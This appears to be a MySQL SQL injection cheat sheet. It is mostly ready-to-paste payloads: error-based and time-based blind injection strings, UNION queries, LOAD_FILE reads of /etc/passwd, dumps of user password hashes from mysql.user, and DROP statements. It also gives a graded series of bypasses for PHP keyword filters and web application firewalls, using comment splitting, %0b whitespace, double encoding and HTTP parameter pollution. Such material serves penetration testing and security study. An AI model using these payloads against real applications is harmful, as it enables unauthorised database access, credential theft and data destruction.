Version:

SELECT @@version
version()

Comments:

SELECT 1; #COMMENT
SELECT /*COMMENT*/ 1;

Current User:

SELECT user();
SELECT system_user();

List User:

SELECT user FROM mysql.user; (need priv)

List Password Hashes:

SELECT host, user, password FROM mysql.user; (need priv)

Current Database:

SELECT database()

List Database:

SELECT schema_name FROM information_schema.schemata; (MySQL >= 5.0)
SELECT distinct(db) FROM mysql.db (need priv)

Quick Detection
Error Based SQLi:
For integer inputs:

(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

For string inputs:

'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Clear SQLi Tests:

?id=4
?id=5-1
?id=4 OR 1=1
?id=-1 OR 17-7=10

Blind SQL Injection Time Based

SLEEP(5)-- 
SELECT BENCHMARK(1000000,MD5('A'));
id=1 OR SLEEP(25)=0 LIMIT 1-- 
id=1) OR SLEEP(25)=0 LIMIT 1-- 
id=1' OR SLEEP(25)=0 LIMIT 1-- 
id=1') OR SLEEP(25)=0 LIMIT 1-- 
id=1)) OR SLEEP(25)=0 LIMIT 1-- 
id=SELECT SLEEP(25)-- 

Line Comments

DROP sampletable;--
DROP sampletable;#
admin' or '1'='1'-- 

Inline Comments

DROP/**/sampletable;
DR/**/OP/**/sampletable;

If Statements

SELECT IF(1=1, 1, 2)
SELECT IF(user()='root@localhost','true','false')

String without Quotes

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

LoadFile

' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
This will show the content of c:\boot.ini

List User

SELECT * FROM 'user' WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user

List Password

SELECT user, password FROM mysql.user
SELECT user, password FROM mysql.user LIMIT 1,1
SELECT password FROM mysql.user WHERE user = 'root'

List Databases

SELECT schema_name FROM information_schema.schemata;
SELECT schema_name FROM information_schema.schemata LIMIT 1,1;

Privileges

SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
SELECT Super_priv FROM mysql.user WHERE user= ‘root’ LIMIT 1,1--

Getting Column Names

SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’
tblUsers -> tablename
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
find table which have a column called 'username'

Time Based SQLi Exploitation

?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
{INJECTION} = You want to run the query.
ASCII <==> HEX
MID <==> SUBSTRING <==> SUBSTR

Something About Bypass

PHP filter code: preg_match('/(and|or)/i',$id);
Bypass: 1||1    1&&1

PHP filter code: preg_match('/(and|or|union)/i', $id);
Payload: union select user, password from users
Bypass:  1 || (select user from users where user_id = 1) = 'admin'

PHP filter code: preg_match('/(and|or|union|where)/i', $id)
Payload: 1 || (select user from users where user_id = 1) = 'admin'
Bypass:  1 || (select user from users limit 1) = 'admin'

PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
Payload: 1 || (select user from users limit 1) = 'admin'
Bypass:  1 || (select user from users group by user_id having user_id=1) = 'admin'

PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Payload: 1 || (select user from users group by user_id having user_id=1) = 'admin'
Bypass:  1 || (select substr(group_concat(user_id),1,1) user from users) = 1

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Payload: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypass:  1 || 1=1 into outfile 'result.txt'
Bypass:  1 || substr(user,1,1)='a'

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Payload: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypass:  1 || user_id is not null
Bypass:  1 || substr(user,1,1) = 0x61
Bypass:  1 || substr(user,1,1) = unhex(61)

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Payload: 1 || substr(user,1,1) = unhex(61)
Bypass:  1 || substr(user,1,1) = lower(conv(10,10,36))

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Payload: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypass:  1 || lpad(user,7,1)

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Payload: 1 || lpad(user, 7, 1)
Bypass:  1%0b||%0blpad(user,7,1)

Bypass with comments
id=1+un/**/ion+se/**/lect+1,2,3-- 

Bypass Regex Filter: /union\sselect/g
1+UnIon/**/SeLecT/**/1,2,3-- 

Bypass preg_replace
1+UNunionION+SEselectLECT+1,2,3--

If WAF use preg_replace to replace SQL keywords to whitespace
1+uni%0bon+se%0blect+1,2,3--

For Mod_rewrite, /**/ cannot bypassed. So we use %0b replace /**/

Double encode can bypass some waf
1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

e.g.
id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
%0D%0A as a newline
==>
0 div 1 union#foo/**/bar
select#foo
1,2,current

Inline Comments
id=1/*!uNIon*/SeLeCt+1,2,3-- 
id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

HPP (HTTP Parameter Pollution:Split and Join)

+------------------------------------------------------------------+
| Web Server       | Parameter Interpretation     | Example       |
+------------------------------------------------------------------+
| ASP.NET/IIS      | Concatenation by comma     | par1=val1,val2  |
| ASP/IIS      | Concatenation by comma     | par1=val1,val2  |
| PHP/Apache      | The last param is resulting  | par1=val2       |
| JSP/Tomcat      | The first param is resulting | par1=val1       |
| Perl/Apache      | The first param is resulting | par1=val1       |
| DBMan          | Concatenation by two tildes  | par1=val1~~val2 |
+------------------------------------------------------------------+

HPC (HTTP Parameter Contamination)

    +-----------------------------------------------------------+
    | Query String      |    Web Servers response / GET values    |
    +-----------------------------------------------------------+
    |           | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP        |
    +-----------------------------------------------------------+
    | ?test[1=2      | test_1=2              | test[1=2        |
    | ?test=%        | test=%             | test=        |
    | ?test%00=1      | test=1                    | test=1        |
    | ?test=1%001      | NULL             | test=1        |
    | ?test+d=1+2      | test_d=1 2             | test d=1 2   |
    +-----------------------------------------------------------+

SUBSTRING/MID
截取字符串

CONCAT
字符串连接

hex()/unhex()